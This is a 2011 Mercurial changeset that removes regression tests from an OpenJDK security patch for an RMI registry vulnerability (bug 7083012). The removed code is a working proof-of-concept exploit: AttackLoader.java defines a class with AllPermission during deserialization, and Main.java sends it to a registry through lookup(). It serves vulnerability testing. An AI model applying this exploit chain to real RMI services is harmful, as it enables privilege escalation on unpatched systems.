# HG changeset patch # User Andrew John Hughes # Date 1319205876 -3600 # Node ID 7a2f446f71e1fc6cb776e780c6bcf82a9fa1d610 # Parent f6676bb0b93bb430317776970930ed24aae9d2d2 Remove testcases not in upstream version. 2011-10-21 Andrew John Hughes * patches/security/20111018/7083012.patch: Remove testcases not in upstream version. diff -r f6676bb0b93b -r 7a2f446f71e1 ChangeLog --- a/ChangeLog Wed Oct 19 06:11:08 2011 +0100 +++ b/ChangeLog Fri Oct 21 15:04:36 2011 +0100 @@ -1,3 +1,8 @@ +2011-10-21 Andrew John Hughes + + * patches/security/20111018/7083012.patch: + Remove testcases not in upstream version. + 2011-10-19 Andrew John Hughes * NEWS: Fix broken entry. diff -r f6676bb0b93b -r 7a2f446f71e1 patches/security/20111018/7083012.patch --- a/patches/security/20111018/7083012.patch Wed Oct 19 06:11:08 2011 +0100 +++ b/patches/security/20111018/7083012.patch Fri Oct 21 15:04:36 2011 +0100 @@ -141,834 +141,3 @@ PermissionCollection perms, boolean forLoader) { ---- /dev/null Fri Sep 16 10:04:16 2011 -+++ openjdk/jdk/test/sun/rmi/registry/7083012/altreg/Registry.java Fri Sep 16 10:04:03 2011 -@@ -0,0 +1,192 @@ -+/* -+ * Copyright (c) 2011, Oracle and/or its affiliates. All rights reserved. -+ * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. -+ * -+ * This code is free software; you can redistribute it and/or modify it -+ * under the terms of the GNU General Public License version 2 only, as -+ * published by the Free Software Foundation. -+ * -+ * This code is distributed in the hope that it will be useful, but WITHOUT -+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or -+ * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License -+ * version 2 for more details (a copy is included in the LICENSE file that -+ * accompanied this code). -+ * -+ * You should have received a copy of the GNU General Public License version -+ * 2 along with this work; if not, write to the Free Software Foundation, -+ * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. -+ * -+ * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA -+ * or visit www.oracle.com if you need additional information or have any -+ * questions. -+ */ -+ -+package java.rmi.registry; -+ -+import java.rmi.AccessException; -+import java.rmi.AlreadyBoundException; -+import java.rmi.NotBoundException; -+import java.rmi.Remote; -+import java.rmi.RemoteException; -+ -+/** -+ * Registry is a remote interface to a simple remote -+ * object registry that provides methods for storing and retrieving -+ * remote object references bound with arbitrary string names. The -+ * bind, unbind, and rebind -+ * methods are used to alter the name bindings in the registry, and -+ * the lookup and list methods are used to -+ * query the current name bindings. -+ * -+ *

In its typical usage, a Registry enables RMI client -+ * bootstrapping: it provides a simple means for a client to obtain an -+ * initial reference to a remote object. Therefore, a registry's -+ * remote object implementation is typically exported with a -+ * well-known address, such as with a well-known {@link -+ * java.rmi.server.ObjID#REGISTRY_ID ObjID} and TCP port number -+ * (default is {@link #REGISTRY_PORT 1099}). -+ * -+ *

The {@link LocateRegistry} class provides a programmatic API for -+ * constructing a bootstrap reference to a Registry at a -+ * remote address (see the static getRegistry methods) -+ * and for creating and exporting a Registry in the -+ * current VM on a particular local address (see the static -+ * createRegistry methods). -+ * -+ *

A Registry implementation may choose to restrict -+ * access to some or all of its methods (for example, methods that -+ * mutate the registry's bindings may be restricted to calls -+ * originating from the local host). If a Registry -+ * method chooses to deny access for a given invocation, its -+ * implementation may throw {@link java.rmi.AccessException}, which -+ * (because it extends {@link java.rmi.RemoteException}) will be -+ * wrapped in a {@link java.rmi.ServerException} when caught by a -+ * remote client. -+ * -+ *

The names used for bindings in a Registry are pure -+ * strings, not parsed. A service which stores its remote reference -+ * in a Registry may wish to use a package name as a -+ * prefix in the name binding to reduce the likelihood of name -+ * collisions in the registry. -+ * -+ * @author Ann Wollrath -+ * @author Peter Jones -+ * @version %I%, %E% -+ * @since JDK1.1 -+ * @see LocateRegistry -+ */ -+public interface Registry extends Remote { -+ -+ /** Well known port for registry. */ -+ public static final int REGISTRY_PORT = 1099; -+ -+ /** -+ * Returns the remote reference bound to the specified -+ * name in this registry. -+ * -+ * @param name the name for the remote reference to look up -+ * -+ * @return a reference to a remote object -+ * -+ * @throws NotBoundException if name is not currently bound -+ * -+ * @throws RemoteException if remote communication with the -+ * registry failed; if exception is a ServerException -+ * containing an AccessException, then the registry -+ * denies the caller access to perform this operation -+ * -+ * @throws AccessException if this registry is local and it denies -+ * the caller access to perform this operation -+ * -+ * @throws NullPointerException if name is null -+ */ -+ public Remote lookup(Object name) -+ throws RemoteException, NotBoundException, AccessException; -+ -+ /** -+ * Binds a remote reference to the specified name in -+ * this registry. -+ * -+ * @param name the name to associate with the remote reference -+ * @param obj a reference to a remote object (usually a stub) -+ * -+ * @throws AlreadyBoundException if name is already bound -+ * -+ * @throws RemoteException if remote communication with the -+ * registry failed; if exception is a ServerException -+ * containing an AccessException, then the registry -+ * denies the caller access to perform this operation (if -+ * originating from a non-local host, for example) -+ * -+ * @throws AccessException if this registry is local and it denies -+ * the caller access to perform this operation -+ * -+ * @throws NullPointerException if name is -+ * null, or if obj is null -+ */ -+ public void bind(String name, Remote obj) -+ throws RemoteException, AlreadyBoundException, AccessException; -+ -+ /** -+ * Removes the binding for the specified name in -+ * this registry. -+ * -+ * @param name the name of the binding to remove -+ * -+ * @throws NotBoundException if name is not currently bound -+ * -+ * @throws RemoteException if remote communication with the -+ * registry failed; if exception is a ServerException -+ * containing an AccessException, then the registry -+ * denies the caller access to perform this operation (if -+ * originating from a non-local host, for example) -+ * -+ * @throws AccessException if this registry is local and it denies -+ * the caller access to perform this operation -+ * -+ * @throws NullPointerException if name is null -+ */ -+ public void unbind(String name) -+ throws RemoteException, NotBoundException, AccessException; -+ -+ /** -+ * Replaces the binding for the specified name in -+ * this registry with the supplied remote reference. If there is -+ * an existing binding for the specified name, it is -+ * discarded. -+ * -+ * @param name the name to associate with the remote reference -+ * @param obj a reference to a remote object (usually a stub) -+ * -+ * @throws RemoteException if remote communication with the -+ * registry failed; if exception is a ServerException -+ * containing an AccessException, then the registry -+ * denies the caller access to perform this operation (if -+ * originating from a non-local host, for example) -+ * -+ * @throws AccessException if this registry is local and it denies -+ * the caller access to perform this operation -+ * -+ * @throws NullPointerException if name is -+ * null, or if obj is null -+ */ -+ public void rebind(String name, Remote obj) -+ throws RemoteException, AccessException; -+ -+ /** -+ * Returns an array of the names bound in this registry. The -+ * array will contain a snapshot of the names bound in this -+ * registry at the time of the given invocation of this method. -+ * -+ * @return an array of the names bound in this registry -+ * -+ * @throws RemoteException if remote communication with the -+ * registry failed; if exception is a ServerException -+ * containing an AccessException, then the registry -+ * denies the caller access to perform this operation -+ * -+ * @throws AccessException if this registry is local and it denies -+ * the caller access to perform this operation -+ */ -+ public String[] list() throws RemoteException, AccessException; -+} ---- /dev/null Fri Sep 16 10:04:45 2011 -+++ openjdk/jdk/test/sun/rmi/registry/7083012/altreg/RegistryImpl.java Fri Sep 16 10:04:34 2011 -@@ -0,0 +1,358 @@ -+/* -+ * Copyright (c) 2011, Oracle and/or its affiliates. All rights reserved. -+ * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. -+ * -+ * This code is free software; you can redistribute it and/or modify it -+ * under the terms of the GNU General Public License version 2 only, as -+ * published by the Free Software Foundation. -+ * -+ * This code is distributed in the hope that it will be useful, but WITHOUT -+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or -+ * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License -+ * version 2 for more details (a copy is included in the LICENSE file that -+ * accompanied this code). -+ * -+ * You should have received a copy of the GNU General Public License version -+ * 2 along with this work; if not, write to the Free Software Foundation, -+ * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. -+ * -+ * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA -+ * or visit www.oracle.com if you need additional information or have any -+ * questions. -+ */ -+ -+package sun.rmi.registry; -+ -+import java.util.Enumeration; -+import java.util.Hashtable; -+import java.util.MissingResourceException; -+import java.util.ResourceBundle; -+import java.io.IOException; -+import java.net.*; -+import java.rmi.*; -+import java.rmi.server.ObjID; -+import java.rmi.server.RemoteServer; -+import java.rmi.server.ServerNotActiveException; -+import java.rmi.registry.Registry; -+import java.rmi.server.RMIClientSocketFactory; -+import java.rmi.server.RMIServerSocketFactory; -+import java.security.PrivilegedActionException; -+import java.text.MessageFormat; -+import sun.rmi.server.UnicastServerRef; -+import sun.rmi.server.UnicastServerRef2; -+import sun.rmi.transport.LiveRef; -+import sun.rmi.transport.ObjectTable; -+import sun.rmi.transport.Target; -+ -+/** -+ * A "registry" exists on every node that allows RMI connections to -+ * servers on that node. The registry on a particular node contains a -+ * transient database that maps names to remote objects. When the -+ * node boots, the registry database is empty. The names stored in the -+ * registry are pure and are not parsed. A service storing itself in -+ * the registry may want to prefix its name of the service by a package -+ * name (although not required), to reduce name collisions in the -+ * registry. -+ * -+ * The LocateRegistry class is used to obtain registry for different hosts. -+ * -+ * @see java.rmi.registry.LocateRegistry -+ */ -+public class RegistryImpl extends java.rmi.server.RemoteServer -+ implements Registry -+{ -+ -+ /* indicate compatibility with JDK 1.1.x version of class */ -+ private static final long serialVersionUID = 4666870661827494597L; -+ private Hashtable bindings = new Hashtable(101); -+ private static Hashtable allowedAccessCache = new Hashtable(3); -+ private static RegistryImpl registry; -+ private static ObjID id = new ObjID(ObjID.REGISTRY_ID); -+ -+ private static ResourceBundle resources = null; -+ -+ /** -+ * Construct a new RegistryImpl on the specified port with the -+ * given custom socket factory pair. -+ */ -+ public RegistryImpl(int port, -+ RMIClientSocketFactory csf, -+ RMIServerSocketFactory ssf) -+ throws RemoteException -+ { -+ LiveRef lref = new LiveRef(id, port, csf, ssf); -+ setup(new UnicastServerRef2(lref)); -+ } -+ -+ /** -+ * Construct a new RegistryImpl on the specified port. -+ */ -+ public RegistryImpl(int port) -+ throws RemoteException -+ { -+ LiveRef lref = new LiveRef(id, port); -+ setup(new UnicastServerRef(lref)); -+ } -+ -+ /* -+ * Create the export the object using the parameter -+ * uref -+ */ -+ private void setup(UnicastServerRef uref) -+ throws RemoteException -+ { -+ /* Server ref must be created and assigned before remote -+ * object 'this' can be exported. -+ */ -+ ref = uref; -+ uref.exportObject(this, null, true); -+ } -+ -+ /** -+ * Returns the remote object for specified name in the registry. -+ * @exception RemoteException If remote operation failed. -+ * @exception NotBound If name is not currently bound. -+ */ -+ public Remote lookup(Object name) -+ throws RemoteException, NotBoundException -+ { -+ synchronized (bindings) { -+ Remote obj = (Remote)bindings.get(name); -+ if (obj == null) -+ throw new NotBoundException(); -+ return obj; -+ } -+ } -+ -+ /** -+ * Binds the name to the specified remote object. -+ * @exception RemoteException If remote operation failed. -+ * @exception AlreadyBoundException If name is already bound. -+ */ -+ public void bind(String name, Remote obj) -+ throws RemoteException, AlreadyBoundException, AccessException -+ { -+ checkAccess("Registry.bind"); -+ synchronized (bindings) { -+ Remote curr = (Remote)bindings.get(name); -+ if (curr != null) -+ throw new AlreadyBoundException(name); -+ bindings.put(name, obj); -+ } -+ } -+ -+ /** -+ * Unbind the name. -+ * @exception RemoteException If remote operation failed. -+ * @exception NotBound If name is not currently bound. -+ */ -+ public void unbind(String name) -+ throws RemoteException, NotBoundException, AccessException -+ { -+ checkAccess("Registry.unbind"); -+ synchronized (bindings) { -+ Remote obj = (Remote)bindings.get(name); -+ if (obj == null) -+ throw new NotBoundException(name); -+ bindings.remove(name); -+ } -+ } -+ -+ /** -+ * Rebind the name to a new object, replaces any existing binding. -+ * @exception RemoteException If remote operation failed. -+ */ -+ public void rebind(String name, Remote obj) -+ throws RemoteException, AccessException -+ { -+ checkAccess("Registry.rebind"); -+ bindings.put(name, obj); -+ } -+ -+ /** -+ * Returns an enumeration of the names in the registry. -+ * @exception RemoteException If remote operation failed. -+ */ -+ public String[] list() -+ throws RemoteException -+ { -+ String[] names; -+ synchronized (bindings) { -+ int i = bindings.size(); -+ names = new String[i]; -+ Enumeration enum_ = bindings.keys(); -+ while ((--i) >= 0) -+ names[i] = (String)enum_.nextElement(); -+ } -+ return names; -+ } -+ -+ /** -+ * Check that the caller has access to perform indicated operation. -+ * The client must be on same the same host as this server. -+ */ -+ public static void checkAccess(String op) throws AccessException { -+ -+ try { -+ /* -+ * Get client host that this registry operation was made from. -+ */ -+ final String clientHostName = getClientHost(); -+ InetAddress clientHost; -+ -+ try { -+ clientHost = (InetAddress) -+ java.security.AccessController.doPrivileged( -+ new java.security.PrivilegedExceptionAction() { -+ public Object run() -+ throws java.net.UnknownHostException -+ { -+ return InetAddress.getByName(clientHostName); -+ } -+ }); -+ } catch (PrivilegedActionException pae) { -+ throw (java.net.UnknownHostException) pae.getException(); -+ } -+ -+ // if client not yet seen, make sure client allowed access -+ if (allowedAccessCache.get(clientHost) == null) { -+ -+ if (clientHost.isAnyLocalAddress()) { -+ throw new AccessException( -+ "Registry." + op + " disallowed; origin unknown"); -+ } -+ -+ try { -+ final InetAddress finalClientHost = clientHost; -+ -+ java.security.AccessController.doPrivileged( -+ new java.security.PrivilegedExceptionAction() { -+ public Object run() throws java.io.IOException { -+ /* -+ * if a ServerSocket can be bound to the client's -+ * address then that address must be local -+ */ -+ (new ServerSocket(0, 10, finalClientHost)).close(); -+ allowedAccessCache.put(finalClientHost, -+ finalClientHost); -+ return null; -+ } -+ }); -+ } catch (PrivilegedActionException pae) { -+ // must have been an IOException -+ -+ throw new AccessException( -+ "Registry." + op + " disallowed; origin " + -+ clientHost + " is non-local host"); -+ } -+ } -+ } catch (ServerNotActiveException ex) { -+ /* -+ * Local call from this VM: allow access. -+ */ -+ } catch (java.net.UnknownHostException ex) { -+ throw new AccessException("Registry." + op + -+ " disallowed; origin is unknown host"); -+ } -+ } -+ -+ public static ObjID getID() { -+ return id; -+ } -+ -+ /** -+ * Retrieves text resources from the locale-specific properties file. -+ */ -+ private static String getTextResource(String key) { -+ if (resources == null) { -+ try { -+ resources = ResourceBundle.getBundle( -+ "sun.rmi.registry.resources.rmiregistry"); -+ } catch (MissingResourceException mre) { -+ } -+ if (resources == null) { -+ // throwing an Error is a bit extreme, methinks -+ return ("[missing resource file: " + key + "]"); -+ } -+ } -+ -+ String val = null; -+ try { -+ val = resources.getString(key); -+ } catch (MissingResourceException mre) { -+ } -+ -+ if (val == null) { -+ return ("[missing resource: " + key + "]"); -+ } else { -+ return (val); -+ } -+ } -+ -+ /** -+ * Main program to start a registry.
-+ * The port number can be specified on the command line. -+ */ -+ public static void main(String args[]) -+ { -+ // Create and install the security manager if one is not installed -+ // already. -+ if (System.getSecurityManager() == null) { -+ System.setSecurityManager(new RMISecurityManager()); -+ } -+ -+ try { -+ /* -+ * Fix bugid 4147561: When JDK tools are executed, the value of -+ * the CLASSPATH environment variable for the shell in which they -+ * were invoked is no longer incorporated into the application -+ * class path; CLASSPATH's only effect is to be the value of the -+ * system property "env.class.path". To preserve the previous -+ * (JDK1.1 and JDK1.2beta3) behavior of this tool, however, its -+ * CLASSPATH should still be considered when resolving classes -+ * being unmarshalled. To effect this old behavior, a class -+ * loader that loads from the file path specified in the -+ * "env.class.path" property is created and set to be the context -+ * class loader before the remote object is exported. -+ */ -+ String envcp = System.getProperty("env.class.path"); -+ if (envcp == null) { -+ envcp = "."; // preserve old default behavior -+ } -+ URL[] urls = sun.misc.URLClassPath.pathToURLs(envcp); -+ ClassLoader cl = new URLClassLoader(urls); -+ -+ /* -+ * Fix bugid 4242317: Classes defined by this class loader should -+ * be annotated with the value of the "java.rmi.server.codebase" -+ * property, not the "file:" URLs for the CLASSPATH elements. -+ */ -+ sun.rmi.server.LoaderHandler.registerCodebaseLoader(cl); -+ -+ Thread.currentThread().setContextClassLoader(cl); -+ -+ int regPort = Registry.REGISTRY_PORT; -+ if (args.length >= 1) { -+ regPort = Integer.parseInt(args[0]); -+ } -+ registry = new RegistryImpl(regPort); -+ // prevent registry from exiting -+ while (true) { -+ try { -+ Thread.sleep(Long.MAX_VALUE); -+ } catch (InterruptedException e) { -+ } -+ } -+ } catch (NumberFormatException e) { -+ System.err.println(MessageFormat.format( -+ getTextResource("rmiregistry.port.badnumber"), -+ args[0] )); -+ System.err.println(MessageFormat.format( -+ getTextResource("rmiregistry.usage"), -+ "rmiregistry" )); -+ } catch (Exception e) { -+ e.printStackTrace(); -+ } -+ System.exit(1); -+ } -+} ---- /dev/null Fri Sep 16 10:05:16 2011 -+++ openjdk/jdk/test/sun/rmi/registry/7083012/Attack.java Fri Sep 16 10:05:05 2011 -@@ -0,0 +1,41 @@ -+/* -+ * Copyright (c) 2011, Oracle and/or its affiliates. All rights reserved. -+ * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. -+ * -+ * This code is free software; you can redistribute it and/or modify it -+ * under the terms of the GNU General Public License version 2 only, as -+ * published by the Free Software Foundation. -+ * -+ * This code is distributed in the hope that it will be useful, but WITHOUT -+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or -+ * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License -+ * version 2 for more details (a copy is included in the LICENSE file that -+ * accompanied this code). -+ * -+ * You should have received a copy of the GNU General Public License version -+ * 2 along with this work; if not, write to the Free Software Foundation, -+ * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. -+ * -+ * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA -+ * or visit www.oracle.com if you need additional information or have any -+ * questions. -+ */ -+ -+import java.io.*; -+import java.security.*; -+ -+public class Attack implements PrivilegedExceptionAction { -+ public Void run() throws IOException { -+ String filename = "pwnd.txt"; -+ System.out.println("Attack: running with elevated permissions"); -+ FileWriter fw = new FileWriter(filename); -+ fw.write("You've just been pwned!\n"); -+ fw.close(); -+ System.out.println("BAD: successfully wrote to local filesystem"); -+ return null; -+ } -+ -+ public Attack() throws PrivilegedActionException { -+ AccessController.doPrivileged(this); -+ } -+} ---- /dev/null Fri Sep 16 10:05:47 2011 -+++ openjdk/jdk/test/sun/rmi/registry/7083012/AttackLoader.java Fri Sep 16 10:05:33 2011 -@@ -0,0 +1,51 @@ -+/* -+ * Copyright (c) 2011, Oracle and/or its affiliates. All rights reserved. -+ * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. -+ * -+ * This code is free software; you can redistribute it and/or modify it -+ * under the terms of the GNU General Public License version 2 only, as -+ * published by the Free Software Foundation. -+ * -+ * This code is distributed in the hope that it will be useful, but WITHOUT -+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or -+ * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License -+ * version 2 for more details (a copy is included in the LICENSE file that -+ * accompanied this code). -+ * -+ * You should have received a copy of the GNU General Public License version -+ * 2 along with this work; if not, write to the Free Software Foundation, -+ * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. -+ * -+ * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA -+ * or visit www.oracle.com if you need additional information or have any -+ * questions. -+ */ -+ -+import java.io.*; -+import java.security.*; -+ -+public class AttackLoader extends ClassLoader implements java.io.Serializable { -+ public AttackLoader() { } -+ -+ public Object readResolve() throws ObjectStreamException, ClassFormatError, -+ InstantiationException, IllegalAccessException, -+ PrivilegedActionException, IOException { -+ System.out.println("AttackLoader: readResolve()"); -+ -+ byte[] classbytes = new byte[100000]; // should be big enough -+ InputStream in = getClass().getResourceAsStream("/Attack.class"); -+ int len = in.read(classbytes); -+ -+ AllPermission ap = new AllPermission(); -+ PermissionCollection pc = ap.newPermissionCollection(); -+ pc.add(ap); -+ ProtectionDomain pd = new ProtectionDomain( -+ new CodeSource(null, (CodeSigner[])null), pc); -+ -+ System.out.println("AttackLoader: calling defineClass()"); -+ Class clazz = defineClass(null, classbytes, 0, len, pd); -+ System.out.println("AttackLoader: instantiating loaded class"); -+ Object obj = clazz.newInstance(); -+ return this; -+ } -+} ---- /dev/null Fri Sep 16 10:06:20 2011 -+++ openjdk/jdk/test/sun/rmi/registry/7083012/Main.java Fri Sep 16 10:06:08 2011 -@@ -0,0 +1,42 @@ -+/* -+ * Copyright (c) 2011, Oracle and/or its affiliates. All rights reserved. -+ * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. -+ * -+ * This code is free software; you can redistribute it and/or modify it -+ * under the terms of the GNU General Public License version 2 only, as -+ * published by the Free Software Foundation. -+ * -+ * This code is distributed in the hope that it will be useful, but WITHOUT -+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or -+ * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License -+ * version 2 for more details (a copy is included in the LICENSE file that -+ * accompanied this code). -+ * -+ * You should have received a copy of the GNU General Public License version -+ * 2 along with this work; if not, write to the Free Software Foundation, -+ * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. -+ * -+ * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA -+ * or visit www.oracle.com if you need additional information or have any -+ * questions. -+ */ -+ -+import java.rmi.RemoteException; -+import java.rmi.NotBoundException; -+import java.rmi.registry.Registry; -+import java.rmi.registry.LocateRegistry; -+ -+public class Main { -+ public static void main(String args[]) -+ throws RemoteException, NotBoundException { -+ Registry registry; -+ if (args.length > 0) { -+ System.out.println("attacking registry at " + args[0]); -+ registry = LocateRegistry.getRegistry(args[0]); -+ } else { -+ System.out.println("attacking local registry"); -+ registry = LocateRegistry.getRegistry(); -+ } -+ registry.lookup(new AttackLoader()); -+ } -+} ---- /dev/null Fri Sep 16 10:06:47 2011 -+++ openjdk/jdk/test/sun/rmi/registry/7083012/Test7083012.sh Fri Sep 16 10:06:37 2011 -@@ -0,0 +1,129 @@ -+# -+# Copyright (c) 2011, Oracle and/or its affiliates. All rights reserved. -+# DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. -+# -+# This code is free software; you can redistribute it and/or modify it -+# under the terms of the GNU General Public License version 2 only, as -+# published by the Free Software Foundation. -+# -+# This code is distributed in the hope that it will be useful, but WITHOUT -+# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or -+# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License -+# version 2 for more details (a copy is included in the LICENSE file that -+# accompanied this code). -+# -+# You should have received a copy of the GNU General Public License version -+# 2 along with this work; if not, write to the Free Software Foundation, -+# Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. -+# -+# Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA -+# or visit www.oracle.com if you need additional information or have any -+# questions. -+# -+ -+# @test -+# @bug 7083012 -+# @summary new bug to cover the vulnerability with the RMI Registry -+# @run shell/timeout=100 Test7083012.sh -+ -+OS=`uname -s` -+case "$OS" in -+ SunOS | Linux ) -+ PS=":" -+ FS="/" -+ ;; -+ Windows* | CYGWIN* ) -+ PS=";" -+ FS="\\" -+ ;; -+ * ) -+ echo "Unrecognized system!" -+ exit 1; -+ ;; -+esac -+ -+# Look in various places for JDK boot files for rmic. -+RMIC_BOOT= -+for f in \ -+ ${TESTJAVA}${FS}jre${FS}lib${FS}rt.jar \ -+ ${TESTJAVA}${FS}lib${FS}rt.jar \ -+ ${TESTJAVA}${FS}classes ; do -+ if [ -f "$f" -o -d "$f" ] ; then -+ RMIC_BOOT="$f" -+ break -+ fi -+done -+ -+if [ -z "$RMIC_BOOT" ]; then -+ echo "No boot classes found. Needed for this test. Exiting." -+ exit 1; -+fi -+ -+echo RMIC_BOOT=$RMIC_BOOT -+ -+RMIC_OUT=rmic.out -+REGISTRY_DIR=sun${FS}rmi${FS}registry -+RMIREG_OUT=rmireg_out.txt -+ -+cp -r ${TESTSRC}${FS}altreg . -+cp ${TESTSRC}${FS}*java . -+ -+mkdir rmi_tmp -+cd rmi_tmp -+#start rmiregistry without any local classes on classpath -+${TESTJAVA}${FS}bin${FS}rmiregistry > ..${FS}${RMIREG_OUT} 2>&1 & -+RMIREG_PID=$! -+# allow some time to start -+sleep 5 -+cd .. -+ -+# do altreg stuff -+cd altreg -+mkdir classes ${RMIC_OUT} -+${TESTJAVA}${FS}bin${FS}javac -d classes Registry.java RegistryImpl.java -+${TESTJAVA}${FS}bin${FS}rmic -keepgenerated -v1.1 \ -+ -bootclasspath classes${PS}${RMIC_BOOT} \ -+ -d ${RMIC_OUT} sun.rmi.registry.RegistryImpl -+ -+mv ${RMIC_OUT}${FS}${REGISTRY_DIR}${FS}RegistryImpl_Skel.java ${RMIC_OUT}${FS}${REGISTRY_DIR}${FS}RegistryImpl_Skel.java.orig -+sed 's/\(long interfaceHash\).*$/\1 = 4905912898345647071L;/' \ -+ ${RMIC_OUT}${FS}${REGISTRY_DIR}${FS}RegistryImpl_Skel.java.orig > ${RMIC_OUT}${FS}${REGISTRY_DIR}${FS}RegistryImpl_Skel.java -+ -+mv ${RMIC_OUT}${FS}${REGISTRY_DIR}${FS}RegistryImpl_Stub.java ${RMIC_OUT}${FS}${REGISTRY_DIR}${FS}RegistryImpl_Stub.java.orig -+sed 's/\(long interfaceHash\).*$/\1 = 4905912898345647071L;/' \ -+ ${RMIC_OUT}${FS}${REGISTRY_DIR}${FS}RegistryImpl_Stub.java.orig > ${RMIC_OUT}${FS}${REGISTRY_DIR}${FS}RegistryImpl_Stub.java -+ -+${TESTJAVA}${FS}bin${FS}javac -d classes -Xbootclasspath/p:classes ${RMIC_OUT}${FS}${REGISTRY_DIR}${FS}RegistryImpl_Skel.java ${RMIC_OUT}${FS}${REGISTRY_DIR}${FS}RegistryImpl_Stub.java -+ -+${TESTJAVA}${FS}bin${FS}jar -cf altreg.jar -C classes . -+ -+cd .. -+ -+${TESTJAVA}${FS}bin${FS}javac Attack.java AttackLoader.java -+${TESTJAVA}${FS}bin${FS}jar -cf attack.jar Attack.class AttackLoader.class -+ -+${TESTJAVA}${FS}bin${FS}javac -Xbootclasspath/p:altreg/altreg.jar -cp attack.jar Main.java -+${TESTJAVA}${FS}bin${FS}java -Xbootclasspath/p:altreg/altreg.jar -cp .${PS}attack.jar \ -+ -Djava.rmi.server.codebase="file:///`pwd`/attack.jar" Main -+ -+#done - kill rmiregistry and check result -+sleep 1 -+kill -9 ${RMIREG_PID} -+ -+#wait for process to die -+sleep 3 -+ -+# Test is successful if rmiregistry was silent. -+if [ -s ${RMIREG_OUT} ]; then -+ # rmiregistry log file has messages in it; show them -+ echo ========== ${RMIREG_OUT} ========== -+ cat ${RMIREG_OUT} -+ echo ========== end of ${RMIREG_OUT} ========== -+ echo "Failed" -+ exitCode=1; -+else -+ echo "Passed" -+ exitCode=0 -+fi -+rm -rf ${RMIREG_OUT} -+exit ${exitCode}